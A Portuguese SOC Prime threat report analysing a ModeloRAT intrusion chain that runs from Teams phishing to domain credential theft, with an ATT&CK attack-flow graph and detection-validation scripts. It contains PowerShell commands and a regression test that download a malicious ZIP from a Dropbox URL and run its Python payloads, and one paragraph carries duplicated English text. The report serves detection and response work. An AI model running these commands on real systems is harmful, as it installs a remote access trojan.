Dissecando uma Campanha do ModeloRAT: Do Phishing no Teams à Comprometimento de Domínio

SOC Prime Team

Seguir

Dissecando uma Campanha do ModeloRAT: Do Phishing no Teams à Comprometimento de Domínio

Detection stack

AIDR
Alert
ETL
Query

Relatório de Ameaça
Fluxo de Ataque
Detecções
Simulações

Resumo

A Rapid7 analisou uma intrusão que começou com uma mensagem maliciosa do Microsoft Teams disfarçada de suporte de TI. O invasor usou um payload em Python hospedado no Dropbox para implantar o ModeloRAT, escalar privilégios através de CVE-2023-36036, e roubar credenciais de domínio ao apresentar uma tela de bloqueio falsa para a vítima. A campanha mostrou a rapidez com que um invasor poderia passar de um único endpoint comprometido para um roubo de credenciais mais amplo em todo o domínio, confiando em técnicas de viver da terra. O incidente também destaca o crescente risco representado por plataformas de colaboração como um vetor de acesso inicial.

Investigação

A investigação seguiu toda a cadeia de ataque desde a conversa inicial no Teams até um stager PowerShell que baixou um arquivo ZIP do Dropbox, descompactou um ambiente portátil de Python e lançou collector.py and Pmanager.py. O ModeloRAT então estabeleceu uma comunicação HTTP com vários servidores de comando e controle, realizou reconhecimento do host e usou rundll32 para acionar um exploit de kernel que concedeu acesso ao nível do SISTEMA. A persistência foi mantida através de uma tarefa agendada, e os invasores implantaram componentes backdoor adicionais durante a intrusão.

Mitigação

As organizações devem aplicar controles rigorosos sobre o acesso externo no Microsoft Teams, monitorar atividades incomuns de PowerShell e Python, bloquear URLs maliciosos conhecidos do Dropbox e garantir que os sistemas estejam corrigidos contra CVE-2023-36036. Políticas de controle de aplicação que restringem o uso não autorizado podem ajudar a reduzir o risco de exploração. As equipes de segurança também devem observar comportamentos de tela de bloqueio falsa e outros sinais de atividades de colheita de credenciais nos endpoints. rundll32 usage can help reduce exploitation risk. Security teams should also watch for fake lock-screen behavior and other signs of credential-harvesting activity on endpoints.

Resposta

Se esta atividade for detectada, isole imediatamente o endpoint afetado, revogue as credenciais do usuário comprometido e redefina as senhas de domínio afetadas. Os investigadores devem coletar capturas completas de memória, incluindo evidências relacionadas ao LSASS quando apropriado, procurar por artefatos do ModeloRAT e remover quaisquer tarefas agendadas maliciosas ou mecanismos de persistência. As configurações do locatário do Teams também devem ser revisadas, e o chat externo deve ser desativado se não for operacionalmente necessário.

"graph TB %% Class Definitions classDef action fill:#ffcccc classDef tool fill:#cce5ff classDef malware fill:#e6ffcc classDef process fill:#ffd9b3 classDef file fill:#f2e6ff %% Action Nodes action_phishing["Ação – T1566.003 Phishing: Spearphishing via Serviço Mensagem do Microsoft Teams imitando suporte de TI com link malicioso."] class action_phishing action action_impersonation["Ação – T1656 Impersonação Conta falsa de suporte de TI criada para parecer legítima."] class action_impersonation action action_content_injection["Ação – T1659 Injeção de Conteúdo Mensagem contém comando PowerShell que inicia a cadeia de infecção."] class action_content_injection action action_user_execution["Ação – T1204 Execução pelo Usuário Vítima clica no link ou copia e cola o stager de PowerShell."] class action_user_execution action action_software_discovery["Ação – T1518 Descoberta de Software collector.py enumera softwares instalados, patches e configuração."] class action_software_discovery action action_security_discovery["Ação – T1518.001 Descoberta de Software de Segurança Script verifica processos de AV como SecurityHealthHost.exe."] class action_security_discovery action action_system_info["Ação – T1082 Descoberta de Informações do Sistema comandos systeminfo, whoami e outros coletam detalhes do host."] class action_system_info action action_dll_loading["Ação – T1176 Extensões de Software rundll32.exe carrega DLLs maliciosas (ssss.dll, com6848.dll)."] class action_dll_loading action action_priv_esc["Ação – T1068 Exploração para Escalação de Privilégio Exploit CVEu20112023u201136036 em cldflt.sys obtém token SYSTEM."] class action_priv_esc action action_defense_evasion["Ação – T1211 Exploração para Evasão de Defesa Exploit de kernel contorna controles de segurança."] class action_defense_evasion action action_persistence_active_setup["Ação – T1547.014 Configuração Ativa de Persistência Chaves de registro sob SyncRootManager registram provedor de sincronização em nuvem malicioso."] class action_persistence_active_setup action action_event_triggered["Ação – T1546 Execução Disparada por Evento Provedor de sincronização atua como mecanismo de persistência disparada por evento."] class action_event_triggered action action_scheduled_task["Ação – T1053 Tarefa Agendada Tarefa diária TempLogA executa internal.py com privilégios de SISTEMA."] class action_scheduled_task action action_path_interception["Ação – T1574.007 Interceptação de Caminho Diretório portátil de Python colocado cedo no PATH para garantir execução."] class action_path_interception action action_c2_http["Ação – T1071.001 Protocolo de Camada de Aplicação: Protocolos Web ModeloRAT comunica-se com servidores C2 por HTTP na porta 80."] class action_c2_http action action_nonstandard_port["Ação – T1571 Porta Não-Padrão Canais de shell reverso adicionais usam portas 50508 e 60503."] class action_nonstandard_port action action_winrm["Ação – T1563 Sequestro de Sessão de Serviço Remoto Invasor abre sessão WinRM para segundo host para implementação de ferramenta."] class action_winrm action action_rdp["Ação – T1078.002 Contas Válidas: Contas de Domínio Credenciais colhidas usadas para logins RDP."] class action_rdp action action_kerberoasting["Ação – T1558.003 Kerberoasting Solicitações de ticket de serviço geram hashes de credenciais."] class action_kerberoasting action action_os_credential_dump["Ação – T1003 Despejo de Credenciais de SO DumpIt.exe captura memória incluindo LSASS."] class action_os_credential_dump action action_unsecured_credentials["Ação – T1552.001 Credenciais Não-Seguras DLL de tela de bloqueio falsa registra senhas capturadas no disco."] class action_unsecured_credentials action action_window_discovery["Ação – T1010 Descoberta de Janela de Aplicação Réplicas de tela de bloqueio imitam tela de bloqueio do Windows para capturar entradas."] class action_window_discovery action action_bits_job["Ação – T1197 Trabalhos BITS DumpIt baixado e executado via BITS."] class action_bits_job action %% Tool / File / Malware Nodes tool_powershell["Ferramenta – Nome: PowerShell Descrição: Executa comando inicial do stager."] class tool_powershell tool tool_python["Ferramenta – Nome: Python Portátil (pythonw.exe) Descrição: Executa collector.py e Pmanager.py."] class tool_python tool tool_rundll32["Ferramenta – Nome: rundll32.exe Descrição: Carrega payloads de DLL maliciosas."] class tool_rundll32 tool tool_dumpit["Ferramenta – Nome: DumpIt.exe Descrição: Utilitário de aquisição de memória."] class tool_dumpit tool malware_collector["Malware – Nome: collector.py Descrição: Script Python inicial que realiza descoberta e lança módulos adicionais."] class malware_collector malware malware_pmanager["Malware – Nome: Pmanager.py (ModeloRAT) Descrição: Trojan de acesso remoto que se comunica com C2."] class malware_pmanager malware file_ssss_dll["Arquivo – Nome: ssss.dll Descrição: DLL maliciosa carregada para escalação."] class file_ssss_dll file file_com6848_dll["Arquivo – Nome: com6848.dll Descrição: DLL maliciosa carregada para colheita de credenciais."] class file_com6848_dll file file_lockdll["Arquivo – Nome: lockscreen.dll Descrição: Tela de bloqueio falsa que registra senhas."] class file_lockdll file %% Connections u2013 Attack Flow action_phishing –>|uses| action_impersonation action_impersonation –>|delivers| action_content_injection action_content_injection –>|triggers| action_user_execution action_user_execution –>|executes| tool_powershell tool_powershell –>|launches| tool_python tool_python –>|runs| malware_collector tool_python –>|runs| malware_pmanager malware_collector –>|performs| action_software_discovery malware_collector –>|performs| action_security_discovery malware_collector –>|performs| action_system_info malware_pmanager –>|loads| tool_rundll32 tool_rundll32 –>|loads| file_ssss_dll tool_rundll32 –>|loads| file_com6848_dll file_ssss_dll –>|enables| action_priv_esc file_com6848_dll –>|enables| action_priv_esc action_priv_esc –>|provides| action_defense_evasion action_defense_evasion –>|establishes| action_persistence_active_setup action_persistence_active_setup –>|creates| action_event_triggered action_event_triggered –>|creates| action_scheduled_task action_scheduled_task –>|relies on| action_path_interception action_path_interception –>|ensures execution of| malware_pmanager malware_pmanager –>|communicates via| action_c2_http malware_pmanager –>|uses| action_nonstandard_port malware_pmanager –>|opens| action_winrm action_winrm –>|facilitates| action_rdp action_rdp –>|leverages| action_kerberoasting action_kerberoasting –>|provides credentials for| action_os_credential_dump action_os_credential_dump –>|executed by| tool_dumpit tool_dumpit –>|delivered via| action_bits_job action_bits_job –>|supports| action_os_credential_dump action_unsecured_credentials –>|implemented by| file_lockdll file_lockdll –>|captures via| action_window_discovery action_window_discovery –>|writes to| action_unsecured_credentials %% Styling class action_phishing,action_impersonation,action_content_injection,action_user_execution,action_software_discovery,action_security_discovery,action_system_info,action_dll_loading,action_priv_esc,action_defense_evasion,action_persistence_active_setup,action_event_triggered,action_scheduled_task,action_path_interception,action_c2_http,action_nonstandard_port,action_winrm,action_rdp,action_kerberoasting,action_os_credential_dump,action_unsecured_credentials,action_window_discovery,action_bits_job action class tool_powershell,tool_python,tool_rundll32,tool_dumpit tool class malware_collector,malware_pmanager malware class file_ssss_dll,file_com6848_dll,file_lockdll file "

Fluxo de Ataque

Narrativa & Comandos do Ataque:
1. Drop Inicial: O invasor, tendo obtido um acesso inicial na estação de trabalho da vítima, lança o PowerShell para recuperar um arquivo ZIP malicioso hospedado no Dropbox. A URL é codificada na regra de detecção, então o invasor usa a mesma string exata para garantir a detecção (para fins de validação).
2. Extração: Usando o Expand‑Archive cmdlet embutido, o arquivo é descompactado diretamente no %APPDATA% do usuário, um local frequentemente ignorado pelos defensores.
3. Execução do Payload: Dois scripts em Python —collector.py and Pmanager.py— são executados via pythonw.exe (o interpretador “sem janela”) para evitar janelas de console visíveis, capacitando a persistência discreta e exfiltração de dados.
Comandos Exatos (devem corresponder à regra):
```
# 1. Baixar o arquivo ZIP
iwr -Uri "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:APPDATAWinp.zip"

# 2. Extrair o arquivo
Expand-Archive -Path "$env:APPDATAWinp.zip" -DestinationPath "$env:APPDATA"

# 3. Executar o primeiro script Python
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythoncollector.py"

# 4. Executar o segundo script Python
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythonPmanager.py"
```

Script de Teste de Regressão:

# -------------------------------------------------
# Teste de Regressão – Imitar fluxo de trabalho do ModeloRAT PowerShell
# -------------------------------------------------
$zipUrl = "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1"
$zipPath = "$env:APPDATAWinp.zip"
$extractPath = $env:APPDATA
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"
$collector = "$env:APPDATAWPy64-31401pythoncollector.py"
$pmanager = "$env:APPDATAWPy64-31401pythonPmanager.py"

# Download
Write-Host "[*] Baixando ZIP malicioso..."
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath

# Extrair
Write-Host "[*] Extraindo arquivo..."
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

# Executar collector.py
Write-Host "[*] Iniciando collector.py..."
Start-Process -FilePath $pythonExe -ArgumentList $collector

# Executar Pmanager.py
Write-Host "[*] Iniciando Pmanager.py..."
Start-Process -FilePath $pythonExe -ArgumentList $pmanager

Write-Host "[+] Simulação completa. Verifique o SIEM para alerta."

Comandos de Limpeza:

# -------------------------------------------------
# Limpeza – Remover artefatos criados pelo teste
# -------------------------------------------------
$zipPath = "$env:APPDATAWinp.zip"
$extractRoot = "$env:APPDATAWPy64-31401"
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"

# Parar quaisquer processos pythonw em execução deste teste
Get-Process -Name pythonw -ErrorAction SilentlyContinue |
    Where-Object {$_.Path -like "*WPy64-31401*"} |
    Stop-Process -Force

# Remover diretório extraído
if (Test-Path $extractRoot) {
    Remove-Item -Recurse -Force $extractRoot
}

# Remover o arquivo ZIP
if (Test-Path $zipPath) {
    Remove-Item -Force $zipPath
}

Write-Host "[+] Limpeza completa."

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente